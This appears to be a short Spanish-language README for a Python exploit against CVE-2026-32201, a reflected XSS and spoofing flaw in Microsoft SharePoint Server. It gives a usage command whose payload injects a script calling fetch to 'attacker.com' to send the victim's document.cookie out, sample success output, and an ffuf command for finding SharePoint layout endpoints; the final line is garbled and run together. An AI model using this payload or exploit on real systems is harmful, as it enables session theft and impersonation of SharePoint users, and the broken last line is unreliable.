
Exploit en Python para CVE-2026-32201, un XSS reflejado en Microsoft SharePoint Server, que permite la suplantación no autenticada y la modificación de datos mediante solicitudes HTTP manipuladas.
Exploit en Python para CVE-2026-32201 - validación de entrada incorrecta en Microsoft SharePoint Server, que permite suplantación de red no autenticada (C:L/I:L).
python3 exploit.py https://sharepoint.target.com \
--recipient [email protected] \
--sender "[email protected]" \
--message "<script>fetch('http://attacker.com/?c='+document.cookie)</script>" \
--endpoint /_layouts/15/notify.aspx
Ejemplo de salida:
[+] SharePoint detectado.
[*] Enviando solicitud suplantada a https://target.com/_layouts/15/notify.aspx
[+] Estado: 200
[+] Éxito potencial: Revisa los registros/correos del objetivo para ver el contenido suplantado.
ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt--message para el robo de cookies